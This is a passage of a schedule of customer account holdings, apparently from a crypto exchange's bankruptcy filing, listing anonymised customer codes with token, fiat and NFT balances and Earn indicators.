| 07329241 | | DOGE[0], ETH[.03549397], ETHW[0.03505589], SHIB[0], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07329243 | | BTC[0], CUSDT[1], DOGE[1], ETH[0], LINK[0], NFT (28844617011757499/Blood Moon Lunarian #1135)[1], NFT (300897204831514035/Lunarian #3563)[1], SOL[.16619033], SUSHI[0], UNI[0], USD[0.01] | | |
| 07329244 | | USD[10.00] | | |
| 07329245 | | USD[10.00] | | |
| 07329246 | | USD[10.00] | | |
| 07329247 | | AAVE[.5142927], AUD[587.10], AVAX[.86478522], BAT[333.89942139], BCH[1.24667076], BTC[.07910563], CAD[441.39], DAI[80.30108683], DOGE[2406.81925255], ETH[.74522953], ETHW[.74491661], EUR[551.86], GBP[358.40], GRT[438.29995808], LINK[13.5819243], LTC[3.59290747], MATIC[172.70369102], MKR[.02694976], PAXG[.38802041], SOL[6.40129057], SUSHI[39.69922405], TRX[1035.39757347], UNI[14.94543763], USD[3.06], USDT[135.2421962], YFI[.0024354] | Yes | |
| 07329248 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07329249 | | USD[10.00] | | |
| 07329250 | | BRZ[1], DOGE[1], USD[0.01] | | |
| 07329251 | | USD[10.00] | | |
| 07329252 | | BRZ[0], DOGE[0], ETH[0], ETHW[0], GRT[0], TRX[1], USD[0.00] | | |
| 07329253 | | USD[10.00] | | |
| 07329254 | | DOGE[4577.09444565], GRT[83.52356395], TRX[1303.85745655], USD[0.00] | Yes | |
| 07329255 | | USD[10.00] | | |
| 07329256 | | USD[10.00] | | |
| 07329257 | | DOGE[1], TRX[8], USD[0.01], USDT[0] | | |
| 07329258 | | USD[0.00] | | |
| 07329259 | | USD[10.00] | | |
| 07329260 | | USD[10.00] | | |
| 07329261 | | DOGE[0.34030143], USD[0.00] | | |
| 07329262 | | BCH[.01434906], USD[0.00] | | |
| 07329265 | | USD[10.00] | | |
| 07329266 | | BTC[0], USD[0.00] | | |
| 07329267 | | CUSDT[2], DOGE[31394.61166418], USD[10.00] | | |
| 07329268 | | CUSDT[1], USD[12.07], USDT[0] | Yes | |
| 07329269 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07329270 | | AAVE[0], BTC[0.00000001], DOGE[0], ETH[0.00074654], GRT[.00000001], LTC[0], MATIC[.00000001], SOL[0], SUSHI[0], USD[0.00], USDT[0.00000001], YFI[0] | Yes | |
| 07329271 | | CUSDT[1], DOGE[185.62325606], USD[0.00] | | |
| 07329272 | | CUSDT[2], DOGE[5655.38905296], USD[0.00] | Yes | |
| 07329273 | | USD[10.00] | | |
| 07329274 | | USD[10.00] | | |
| 07329277 | | DOGE[1], USD[0.00] | | |
| 07329278 | | SOL[0], USD[1.14] | | |
| 07329279 | | USD[10.00] | | |
| 07329280 | | BTC[0.00506839], CUSDT[21], DOGE[1], LTC[.00074203], MKR[0], PAXG[.00000036], SHIB[1], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07329281 | | CUSDT[5], DOGE[40.33856694], TRX[1.00003454], USD[0.01] | | |
| 07329282 | | USD[10.00] | | |
| 07329283 | | USD[10.00] | | |
| 07329284 | | USD[10.00] | | |
| 07329285 | | CUSDT[1], DOGE[5], TRX[196.72244678], USD[0.00] | | |
| 07329286 | | USD[0.00] | | |
| 07329287 | | BRZ[0], DOGE[2], TRX[1], USD[0.00] | | |
| 07329288 | | DOGE[50.3462214], USD[10.00] | | |
| 07329289 | | USD[10.00] | | |
| 07329290 | | ETH[.00609975], ETHW[.00601848], TRX[1], USD[0.00] | Yes | |
| 07329291 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07329294 | | USD[10.00] | | |
| 07329295 | | USD[10.99] | Yes | |
| 07329296 | | DOGE[1.00006434], USD[0.00] | | |
| 07329297 | | BAT[7.24625604], BTC[.0125964], CUSDT[4], ETH[.05293478], ETHW[.04980583], LINK[9.34965289], SHIB[5658686.36496727], TRX[3], USD[30.00] | | |
| 07329298 | | DOGE[1.00075062], USD[0.29] | | |
| 07329299 | | BTC[0], DOGE[1], TRX[1], USD[0.00] | | |
| 07329300 | | USD[10.00] | | |
| 07329301 | | USD[10.00] | | |
| 07329302 | | USD[86.73] | | |
| 07329303 | | DOGE[554.35302568], USD[0.00] | | |
| 07329304 | | USD[10.00] | | |
| 07329305 | | BRZ[0], DOGE[0], ETH[.00000001], USD[0.00], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07329306 | | BRZ[3], CUSDT[23], DOGE[2544.51821004], LINK[.00002481], LTC[.00000329], MATIC[.0002843], SHIB[5], SOL[.00000172], TRX[.00851597], USD[0.01] | Yes | |
| 07329307 | | USD[10.00] | | |
| 07329309 | | USD[10.00] | | |
| 07329310 | | BCH[0], BRZ[1], BTC[0], DOGE[1.00008338], ETH[0], ETHW[0], LINK[0.00000008], LTC[0], SOL[0.00000001], SUSHI[.00000001], UNI[0.00000007], USD[0.01] | | |
| 07329311 | | DOGE[1], GRT[1], USD[0.00] | | |
| 07329312 | | USD[10.00] | | |
| 07329313 | | CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07329314 | | DOGE[1], USD[0.04] | | |
| 07329315 | | USD[0.01] | | |
| 07329316 | | DOGE[11044.87898452], TRX[0], USD[0.20] | Yes | |
| 07329318 | | BRZ[0], CUSDT[3], DOGE[742.91570701], TRX[2], USD[0.00] | Yes | |
| 07329319 | | USD[0.43] | | |
| 07329320 | | USD[0.19] | | |
| 07329321 | | USD[10.00] | | |
| 07329322 | | USD[10.00] | | |
| 07329323 | | DOGE[170.81198895], USD[0.00] | | |
| 07329324 | | CUSDT[1], DOGE[167.70286711], USD[0.00] | Yes | |
| 07329325 | | CUSDT[1], DOGE[9408.38177188], TRX[174.34769987], USD[0.00] | | |
| 07329326 | | CUSDT[1], DOGE[.00004946], GRT[1], TRX[1], USD[0.00] | | |
| 07329327 | | USD[10.00] | | |
| 07329328 | | USD[10.00] | | |
| 07329329 | | BTC[0], CUSDT[2], DOGE[0], USD[10.00], USDT[0] | | |
| 07329330 | | BTC[.00003636], DOGE[0.05600727], ETH[.00680798], ETHW[.00680798], USD[0.00] | | |
| 07329331 | | USD[10.00] | | |
| 07329332 | | BRZ[1], CUSDT[11], DOGE[279.35922943], GRT[1], TRX[4], USD[0.00] | | |
| 07329333 | | USD[10.00] | | |
| 07329334 | | USD[10.91] | Yes | |
| 07329335 | | BAT[1.02632709], BRZ[2], CUSDT[27], ETH[0], ETHW[0], LINK[0], LTC[0], SHIB[1], SOL[0], TRX[11.04804974], USD[0.01] | Yes | |
| 07329336 | | USD[0.00] | | |
| 07329337 | | USD[10.00] | | |
| 07329339 | | BAT[0], CUSDT[6], DOGE[0], GRT[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07329340 | | ETHW[1.30002756], GRT[1], SHIB[1], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07329341 | | USD[10.00] | | |
| 07329342 | | USD[10.00] | | |
| 07329343 | | DOGE[69.66794352], TRX[252.35964346], USD[0.00] | | |
| 07329344 | | USD[10.00] | | |
| 07329345 | | USD[10.00] | | |
| 07329346 | | CUSDT[1], DOGE[6115.19251273], TRX[1], USD[11.08] | Yes | |
| 07329347 | | USD[10.00] | | |
| 07329348 | | CUSDT[1], TRX[1], USD[0.87] | | |
| 07329349 | | BCH[.01616471], BTC[.00037607], CUSDT[2], DOGE[4360.43515557], ETH[.0028627], ETHW[.0028627], SOL[.98605157], TRX[1], USD[0.00] | | |
| 07329351 | | CUSDT[1], DOGE[1], SHIB[1104402.88617287], USD[0.01] | | |
| 07329352 | | USD[10.00] | | |
| 07329353 | | USD[10.00] | | |
| 07329354 | | TRX[174.41730666], USD[0.00] | | |
| 07329355 | | USD[10.00] | | |
| 07329356 | | USD[10.00] | | |
| 07329357 | | USD[10.00] | | |
| 07329360 | | USD[10.00] | | |
| 07329361 | | USD[10.00] | | |
| 07329362 | | BRZ[1], DOGE[1], USD[0.00] | | |
| 07329363 | | USD[10.00] | | |
| 07329364 | | CUSDT[2], DOGE[34.2706064], USD[0.00] | | |
| 07329365 | | TRX[294.35931232], USD[0.44] | | |
| 07329366 | | USD[10.00] | | |
| 07329367 | | USD[10.00] | | |
| 07329368 | | BRZ[0], DOGE[0], ETH[0], SUSHI[0], USD[0.00], USDT[0.00022033] | | |
| 07329369 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07329370 | | BRZ[1], BTC[.01032498], CUSDT[3], ETH[.34327141], ETHW[.3431243], GRT[14.61174567], LTC[3.24939647], SHIB[73678.98096526], SUSHI[3.19689629], TRX[49.78563681], USD[0.00] | Yes | |
| 07329371 | | USD[10.00] | | |
| 07329374 | | BRZ[1], DOGE[.00316269], USD[0.01] | | |
| 07329376 | | CUSDT[5], NFT (289268317557114724/Crypto The Cat)[1], NFT (378792990129627179/CryptoAvatar)[1], NFT (379808793936069128/CryptoAvatar #7)[1], NFT (507588259859361303/CryptoAvatar #19)[1], NFT (517160151994849265/CryptoAvatar #11)[1], NFT (522607161639006853/CryptoAvatar #13)[1], NFT (524809239941358753/CryptoAvatar #9)[1], NFT (553740566826785329/CryptoAvatar #8)[1], NFT (572060068858317895/CryptoAvatar #16)[1], SOL[0], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07329377 | | DOGE[2582.05063535], TRX[1], USD[0.00] | | |
| 07329379 | | BTC[.0523542], CUSDT[5], DOGE[1431.82173508], TRX[2], USD[0.00] | | |
| 07329381 | | USD[0.01] | | |
| 07329382 | | BRZ[2], CUSDT[2], TRX[4], USD[0.00] | | |
| 07329383 | | BTC[0], DOGE[0], ETH[0], LTC[0], TRX[0], USD[0.00] | | |
| 07329385 | | BTC[.0004842], CUSDT[1], DOGE[25.12710015], USD[52.20] | | |
| 07329386 | | USD[10.00] | | |
| 07329387 | | BRZ[0], CUSDT[3], SHIB[1], USD[25.62] | | |
| 07329389 | | USD[10.00] | | |
| 07329390 | | BRZ[1], CUSDT[17], DOGE[96.48922845], TRX[7], USD[0.00], USDT[0] | | |
| 07329391 | | BRZ[0], BTC[0], CUSDT[5], DOGE[3.00054800], ETH[0], GRT[0], SOL[0], SUSHI[0], TRX[3], UNI[0], USD[0.00] | Yes | |
| 07329392 | | BTC[.0119], ETH[.7466206], ETHW[.7466206], SOL[8.99], USD[1.01] | | |
| 07329394 | | BRZ[0], CUSDT[1], DOGE[1297.79859272], USD[0.00] | Yes | |
| 07329395 | | DOGE[0], USD[0.00] | | |
| 07329396 | | BRZ[1], ETH[.13203256], ETHW[.13096866], USD[0.00] | Yes | |
| 07329397 | | CUSDT[3], DOGE[615.91402735], TRX[1], USD[125.21] | | |
| 07329398 | | CUSDT[1], TRX[205.60726926], USD[0.80] | | |
| 07329399 | | USD[21.73] | | |
| 07329400 | | CUSDT[1], USD[0.00] | | |
| 07329401 | | TRX[1], USD[0.00] | | |
| 07329402 | | BRZ[2], CUSDT[3], USD[0.01] | | |
| 07329403 | | USD[10.00] | | |
| 07329404 | | BAT[1], CUSDT[2], DOGE[182.99115025], TRX[2], USD[0.00] | | |
| 07329405 | | USD[10.00] | | |
| 07329406 | | ETH[0], USD[0.01] | | |
| 07329409 | | ALGO[0], BF_POINT[200], DOGE[1], ETH[0], MATIC[10.02061225], SHIB[4649631.2071981], USD[0.00] | Yes | |
| 07329410 | | BAT[16.71683919], BTC[.001301], USD[0.00] | | |
| 07329411 | | DOGE[24.15902202], USD[0.00] | | |
| 07329412 | | USD[10.00] | | |
| 07329413 | | BRZ[1], USD[0.00] | | |
| 07329414 | | USD[10.00] | | |
| 07329415 | | USD[68.19] | | |
| 07329416 | | DOGE[1], TRX[1], USD[0.50] | | |
| 07329417 | | USD[10.00] | | |
| 07329419 | | USD[10.00] | | |
| 07329420 | | CUSDT[4], DOGE[907.23947843], KSHIB[205.34499327], SHIB[205704.88206253], USD[2.79] | | |
| 07329421 | | USD[10.00] | | |
| 07329422 | | USD[0.00] | Yes | |
| 07329423 | | DOGE[3295.04552517], USD[0.00] | Yes | |
| 07329424 | | USD[10.00] | | |
| 07329425 | | USD[10.00] | | |
| 07329426 | | USD[10.00] | | |
| 07329427 | | USD[10.00] | | |
| 07329429 | | BTC[.0005729], DOGE[5], ETH[.01279753], ETHW[.01279753], LTC[.10739594], USD[0.00] | | |
| 07329431 | | USD[10.00] | | |
| 07329432 | | USD[10.00] | | |
| 07329433 | | USD[10.00] | | |
| 07329434 | | SHIB[128650.45670912], USD[0.00] | | |
| 07329435 | | DOGE[204.64381845], USD[10.00] | | |
| 07329436 | | USD[0.00] | Yes | |
| 07329437 | | BAT[.00057732], BRZ[5], DOGE[2], GRT[2], TRX[8], USD[0.01], USDT[1] | | |
| 07329438 | | TRX[3], USD[0.01] | | |
| 07329439 | | BCH[0], BTC[0], CUSDT[1], DAI[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], UNI[0], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07329440 | | USD[0.00] | | |
| 07329442 | | USD[10.00] | | |
| 07329443 | | USD[10.00] | | |
| 07329444 | | BTC[0], DOGE[0], ETH[0], LTC[0], USD[0.00] | | |
| 07329445 | | BRZ[2], BTC[0], CUSDT[1], USD[0.00] | | |
| 07329446 | | USD[10.00] | | |
| 07329447 | | BTC[.0001], CUSDT[4.2851], DOGE[2646.74339105], USD[0.00] | | |
| 07329448 | | CUSDT[3], DOGE[0], ETH[0], NFT [52177252203993811 4/Coachella x FTX Weekend 2 #19024][1], SHIB[2], USD[0.03] | | |
| 07329449 | | CUSDT[1], DOGE[3923.29220699], TRX[1], USD[0.00] | | |
| 07329451 | | USD[10.00] | | |
| 07329452 | | USD[0.53] | Yes | |
| 07329453 | | USD[0.00] | | |
| 07329454 | | USD[10.00] | | |
| 07329455 | | USD[10.00] | | |
| 07329456 | | USD[0.00] | | |
| 07329457 | | DOGE[1], USD[10.00] | | |
| 07329458 | | USD[10.00] | | |
| 07329459 | | USD[10.00] | | |
| 07329460 | | CUSDT[2], TRX[1], USD[0.05] | | |
| 07329461 | | USD[10.00] | | |
| 07329462 | | USD[10.00] | | |
| 07329464 | | USD[10.00] | | |
| 07329466 | | DOGE[0], ETH[0], LINK[0], USD[0.65] | | |
| 07329467 | | USD[10.00] | | |
| 07329468 | | USD[0.00] | | |
| 07329470 | | USD[10.00] | | |
| 07329471 | | USD[50.68] | | |
| 07329472 | | USD[10.00] | | |
| 07329474 | | USD[10.00] | | |
| 07329475 | | USD[10.00] | | |
| 07329476 | | BAT[1.01655549], BRZ[1], CUSDT[1], DOGE[2], GRT[1.00367791], SHIB[1], TRX[2.000003], USD[373.03], USDT[0] | Yes | |
| 07329477 | | USD[10.00] | | |
| 07329478 | | BAT[0], BRZ[0], DOGE[0], ETH[0], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00] | | |
| 07329479 | | BRZ[1], CUSDT[3], GRT[4], TRX[4], USD[0.01], USDT[2] | | |
| 07329480 | | DOGE[.00000263], LTC[0], USD[0.00] | | |
| 07329481 | | BRZ[0], BTC[0], CUSDT[1], DOGE[2], ETH[0], GRT[0], TRX[0], USD[0.00] | | |
| 07329482 | | DOGE[1], USD[0.00] | | |
| 07329483 | | CUSDT[1], DOGE[4143.02515752], USD[0.00] | | |
| 07329484 | | CUSDT[1], DOGE[2], TRX[1], USD[10.00] | | |
| 07329485 | | BRZ[1], CUSDT[4], DOGE[232.70147645], GRT[1], TRX[1], USD[0.01] | | |
| 07329486 | | BAT[.0668189], CUSDT[3], DOGE[1], ETH[0], LTC[0], TRX[3], USD[0.00] | | |
| 07329487 | | ETH[.00038133], ETHW[.00038133], USD[9.00] | | |
| 07329488 | | USD[0.01] | | |
| 07329489 | | USD[10.00] | | |
| 07329490 | | USD[3.79] | | |
| 07329491 | | BRZ[1], CUSDT[1], DOGE[2578.63266853], SHIB[2055251.56813025], USD[0.64] | | |
| 07329492 | | USD[10.00] | | |
| 07329493 | | USD[10.00] | | |
| 07329494 | | USD[10.00] | | |
| 07329495 | | USD[10.00] | | |
| 07329496 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07329497 | | USD[10.00] | | |
| 07329498 | | BTC[0.00241103], DOGE[1], SHIB[8], USD[0.00] | | |
| 07329499 | | BAT[254.08014825], BCH[1.55770973], BTC[0.00244128], DOGE[0], KSHIB[0], SHIB[3809409.81949490], TRX[480.65370059], USD[0.00] | Yes | |
| 07329500 | | BRZ[2], CUSDT[4], DOGE[1], TRX[7], USD[0.00] | | |
| 07329501 | | USD[10.00] | | |
| 07329502 | | BAT[2.04995663], BRZ[7.35761296], BTC[.00010935], CUSDT[17], DOGE[.1488692], PAXG[.00067341], SHIB[16], TRX[8], USD[1.01], USDT[0.00000001] | Yes | |
| 07329503 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07329504 | | CUSDT[5], DOGE[104.93863153], USD[0.00] | | |
| 07329505 | | DOGE[1508.28906459], ETH[.072112], ETHW[.0712169], USD[0.00] | Yes | |
| 07329506 | | NFT (344592797984918581/Coachella x FTX Weekend 2 #1409)[1], USD[10.00] | | |
| 07329507 | | BRZ[3], CUSDT[5], GRT[1], TRX[3], USD[2385.50], USDT[1] | | |
| 07329508 | | BTC[.00097772], CUSDT[235.47362546], DOGE[1708.18350695], ETH[.00255577], ETHW[.00255577], TRX[1], USD[0.91] | | |
| 07329509 | | BRZ[1], DOGE[1], USD[0.01] | | |
| 07329510 | | TRX[1], USD[0.00] | | |
| 07329511 | | BRZ[1], BTC[.00078584], DOGE[4209.60053737], NFT (567040269642026013/FTX - Off The Grid Miami #2287)[1], TRX[1], USD[0.71] | | |
| 07329512 | | USD[10.00] | | |
| 07329513 | | DOGE[1], USD[0.00] | | |
| 07329515 | | USD[10.00] | | |
| 07329516 | | USD[10.00] | | |
| 07329517 | | USD[0.01] | | |
| 07329518 | | CUSDT[3], DOGE[0], USD[0.00] | | |
| 07329521 | | BCH[0], BTC[0], DOGE[0], ETH[0], GRT[0], LTC[0], PAXG[0], SHIB[1480.73965986], TRX[0], USD[0.00] | Yes | |
| 07329522 | | BRZ[1], USD[0.01] | | |
| 07329523 | | USD[10.00] | | |
| 07329524 | | USD[10.00] | | |
| 07329525 | | CUSDT[2], GRT[76.47976438], USD[0.00] | Yes | |
| 07329526 | | BAT[0], BCH[0], BRZ[1], BTC[0], CUSDT[13], DAI[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0.11613913], MKR[0], SUSHI[0], TRX[0.00388179], USD[0.00] | Yes | |
| 07329527 | | BAT[0], CUSDT[0], DOGE[0], ETH[0.00328269], ETHW[0.00328269], TRX[0], USD[0.00] | | |
| 07329528 | | BRZ[0], DOGE[1], ETH[0], USD[0.00] | Yes | |
| 07329529 | | USD[0.00] | | |
| 07329530 | | USD[10.00] | | |
| 07329531 | | USD[10.00] | | |
| 07329532 | | USD[10.00] | | |
| 07329533 | | USD[10.00] | | |
| 07329535 | | USD[10.00] | | |
| 07329536 | | DOGE[8454.02484651], USD[110.34] | | |
| 07329537 | | USD[10.00] | | |
| 07329538 | | DOGE[ 67336876], TRX[2], USD[0.01] | | |
| 07329539 | | CUSDT[3], USD[0.00] | | |
| 07329540 | | BTC[.00025886], USD[0.00] | Yes | |
| 07329542 | | USD[10.00] | | |
| 07329544 | | CUSDT[5], TRX[1], USD[0.00] | Yes | |
| 07329545 | | CUSDT[2], USD[0.00] | | |
| 07329547 | | BRZ[1], CUSDT[3], DOGE[8.02684755], TRX[5], USD[0.00] | | |
| 07329548 | | BRZ[1], CUSDT[3], USD[0.84] | | |
| 07329549 | | USD[10.00] | | |
| 07329550 | | CUSDT[95.46402998], DOGE[2.0000296], TRX[.177112], USD[0.76] | | |
| 07329551 | | DOGE[20.21741688], USD[0.00] | | |
| 07329552 | | BAT[1], DOGE[1], USD[0.01] | | |
| 07329553 | | BTC[0], ETH[0], USD[0.00] | | |
| 07329554 | | SUSHI[21.9164], USD[0.56] | | |
| 07329555 | | USD[10.00] | | |
| 07329556 | | USD[10.00] | | |
| 07329557 | | CUSDT[1], SHIB[1], USD[0.01] | Yes | |
| 07329558 | | DOGE[ 96947267], USD[6.55] | | |
| 07329559 | | USD[10.00] | | |
| 07329560 | | BRZ[0], BTC[.00000019], CUSDT[3], DOGE[0], SUSHI[0], USD[0.00] | Yes | |
| 07329561 | | USD[0.00] | | |
| 07329562 | | CUSDT[1], DOGE[133.02254629], TRX[1], USD[0.00] | | |
| 07329563 | | DOGE[197.06025051], SOL[.00038452], SUSHI[8.84879906], TRX[1], USD[0.00] | Yes | |
| 07329564 | | DOGE[3.27208497], SUSHI[.00000678], USD[0.84] | | |
| 07329566 | | USD[10.00] | | |
| 07329567 | | AVAX[.02832202], BTC[0], DOGE[0], ETH[.00022534], ETHW[.00019376], MATIC[.60570762], SOL[0], USD[98.31], USDT[0] | | |
| 07329568 | | BRZ[1], BTC[.0052316], CUSDT[12], DOGE[3592.85114014], ETH[.18454727], ETHW[.18454727], SHIB[1], TRX[4], USD[1177.11], USDT[0] | | |
| 07329570 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07329571 | | USD[0.00] | | |
| 07329572 | | USD[10.00] | | |
| 07329574 | | CUSDT[108.01149429], USD[0.07] | | |
| 07329575 | | DOGE[1], USD[0.00] | | |
| 07329576 | | CUSDT[1], USD[0.00] | | |
| 07329577 | | USD[10.00] | | |
| 07329578 | | USD[10.00] | | |
| 07329579 | | DOGE[39.3496161], USD[0.00] | | |
| 07329580 | | CUSDT[2], DOGE[3173.37528486], SHIB[13532238.80013812], USD[0.00] | | |
| 07329581 | | BTC[.00148059], CUSDT[7], DOGE[357.54748952], ETH[.00650077], ETHW[.00650077], SUSHI[1.28329527], USD[0.00] | | |
| 07329582 | | USD[0.00] | | |
| 07329584 | | BRZ[1], DOGE[1], USD[0.00] | | |
| 07329585 | | DOGE[172.59906927], USD[0.00] | | |
| 07329586 | | USD[0.01] | | |
| 07329587 | | TRX[109.95107836], USD[0.00] | | |
| 07329588 | | CUSDT[1], DOGE[2396.39929576], USD[0.00] | Yes | |
| 07329589 | | DOGE[1], USD[0.00] | | |
| 07329590 | | USD[0.00] | | |
| 07329591 | | USD[0.01] | | |
| 07329592 | | USD[0.00] | Yes | |
| 07329593 | | BAT[1.01513617], BRZ[2], CUSDT[11], DOGE[3], SHIB[31.81511229], TRX[2.01614438], USD[0.02] | Yes | |
| 07329595 | | USD[10.00] | | |
| 07329596 | | DOGE[117.15587034], NFT [437063322059994335/Entrance Voucher #29524][1], NFT [49716492305584804 3/Spectra #480][1], USD[0.00], USDT[.00463162] | | |
| 07329597 | | BRZ[1], CUSDT[2], DOGE[1], TRX[1], USD[0.00] | | |
| 07329598 | | USD[10.00] | | |
| 07329599 | | BRZ[1], CUSDT[8], DOGE[5155.29466136], SHIB[6], TRX[2.0000306], USD[0.00] | Yes | |
| 07329600 | | BTC[.00015706], CUSDT[1], DOGE[324.53456746], USD[0.00] | | |
| 07329601 | | USD[10.00] | | |
| 07329602 | | BRZ[.99429123], CUSDT[2.00003838], DOGE[0.00428657], USD[0.54] | Yes | |
| 07329603 | | USD[10.00] | | |
| 07329604 | | USD[10.66] | Yes | |
| 07329606 | | BTC[0], DOGE[0] | | |
| 07329608 | | USD[0.01] | | |
| 07329609 | | USD[0.06] | | |
| 07329610 | | USD[10.00] | | |
| 07329611 | | USD[10.00] | | |
| 07329612 | | USD[10.00] | | |
| 07329613 | | USD[10.00] | | |
| 07329614 | | CUSDT[1], USD[0.01] | | |
| 07329616 | Contingent, Disputed | BTC[.00001411], ETH[.0001219], ETHW[0], SOL[.00110403], USD[0.00] | Yes | |
| 07329617 | | MATIC[.0019513], USD[8604.68] | Yes | |
| 07329618 | | BTC[.00054405], CUSDT[1043.92268716], USD[0.37] | Yes | |
| 07329619 | | USD[1.69] | | |
| 07329620 | | USD[10.00] | | |
| 07329621 | | USD[10.00] | | |
| 07329622 | | USD[10.00] | | |
| 07329624 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], TRX[3], USD[0.00] | | |
| 07329625 | | DOGE[9.25506072], USD[0.00], USDT[0] | Yes | |
| 07329626 | | BTC[.00360153], CUSDT[3], DOGE[669.38714414], USD[0.00] | | |
| 07329627 | | ETH[0], SHIB[1], SOL[0], TRX[3], USD[31.90] | | |
| 07329630 | | USD[0.01] | | |
| 07329631 | | USD[10.00] | | |
| 07329633 | | USD[10.00] | | |
| 07329634 | | LINK[0], TRX[1.03122896], USD[0.00] | | |
| 07329635 | | USD[10.00] | | |
| 07329636 | | USD[10.00] | | |
| 07329637 | | USD[10.00] | | |
| 07329638 | | CUSDT[13], DOGE[194.7568672], SHIB[726222.1959746], USD[19.70] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07329639 | | USD[0.01], USDT[0] | Yes | |
| 07329640 | | DOGE[.13758447], USD[0.00] | | |
| 07329641 | | USD[10.00] | | |
| 07329642 | | USD[10.00] | | |
| 07329643 | | USD[10.00] | | |
| 07329645 | | USD[10.00] | | |
| 07329646 | | BTC[0], USD[7.77], USDT[0] | | |
| 07329647 | | DOGE[15.43879534], USD[0.00] | | |
| 07329648 | | USD[10.00] | | |
| 07329650 | | BRZ[2], CUSDT[27], DOGE[2.00001790], SHIB[3], SOL[0.00000241], SUSHI[.00046309], TRX[.00004707], USD[249.39] | Yes | |
| 07329651 | | DOGE[1], USD[0.01] | | |
| 07329652 | | USD[0.12], USDT[0] | | |
| 07329654 | | CUSDT[5], DOGE[1], TRX[2], USD[0.01] | | |
| 07329655 | | USD[10.00] | | |
| 07329656 | | CUSDT[3], SUSHI[1], TRX[1], USD[11.26] | | |
| 07329657 | | DOGE[2850.71963436], TRX[2], USD[0.14] | | |
| 07329658 | | AAVE[.07078316], BCH[0], BTC[0.00251668], DOGE[512.84087084], ETH[0], GRT[0], LINK[0], MKR[.00516405], NFT (341190682769313279/First 50 #20)[1], NFT (379649702093412156/Dream dog)[1], NFT (515633042139335151/First 50 #23)[1], SHIB[461964.49743964], SOL[0.70619676], SUSHI[4.94257565], TRX[114.54535153], UNI[0], USD[0.00], USDT[0] | | |
| 07329660 | | USD[10.00] | | |
| 07329661 | | USD[10.00] | | |
| 07329662 | | BCH[.15639361], CUSDT[15], DOGE[144.09630316], ETH[.08383069], ETHW[.08383069], GRT[1], LTC[.98854247], SUSHI[2.82168627], TRX[4], USD[0.31] | | |
| 07329663 | | BRZ[1], BTC[0], CUSDT[7], DOGE[4], ETH[0], ETHW[0.37100078], LTC[.00006361], SHIB[2], SOL[0], SUSHI[.00003175], TRX[7], USD[0.00], USDT[3.19646783] | Yes | |
| 07329664 | | BRZ[1], DAI[0.00158735], GRT[.00199407], KSHIB[1847.64947576], NFT (306195875146930487/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #38)[1], NFT (471271407551832622/Entrance Voucher #25163)[1], SHIB[2], SUSHI[.00014761], USD[0.00], USDT[0] | Yes | |
| 07329665 | | BRZ[1], CUSDT[5], TRX[.00035992], UNI[.00000737], USD[0.00] | Yes | |
| 07329666 | | USD[10.00] | | |
| 07329667 | | BTC[0], DOGE[0], SUSHI[0], USD[0.00], YFI[0] | Yes | |
| 07329668 | | USD[10.00] | | |
| 07329669 | | USD[0.00], USDT[0] | | |
| 07329670 | | USD[10.00] | | |
| 07329671 | | USD[10.00] | | |
| 07329672 | | MATIC[.00157732], USD[0.00], USDT[0] | Yes | |
| 07329673 | | BRZ[1], CUSDT[4], DOGE[.00002909], USD[0.00] | | |
| 07329674 | | ETH[0], USD[0.00] | | |
| 07329676 | | USD[10.00] | | |
| 07329677 | | USD[10.00] | | |
| 07329678 | | BTC[0], DOGE[0], UNI[0], USD[0.00] | | |
| 07329680 | | USD[10.00] | | |
| 07329681 | | CUSDT[2], DOGE[25424.69399231], USD[10.67] | Yes | |
| 07329682 | | BTC[0], DOGE[0], LINK[0], SOL[0], USD[67.95] | | |
| 07329683 | | USD[10.00] | | |
| 07329684 | | USD[0.00], YFI[.00030492] | | |
| 07329686 | | USD[0.01] | | |
| 07329687 | | BRZ[0], BTC[0.00031425], CUSDT[2], DOGE[0.09189462], ETH[.00009934], ETHW[.00009934], EUR[0.00], SOL[0], USD[0.00], USDT[150.33007276] | Yes | |
| 07329688 | | BAT[4.31236451], BTC[.0003658], CUSDT[6], DOGE[4.00097112], ETH[0], GRT[2.00021534], LINK[0], SOL[0], SUSHI[1.07558677], TRX[7], USD[0.01], USDT[0], YFI[0] | Yes | |
| 07329689 | | DOGE[2461.53972892], USD[0.00] | | |
| 07329690 | | CUSDT[1], USD[224.59] | | |
| 07329691 | | USD[10.00] | | |
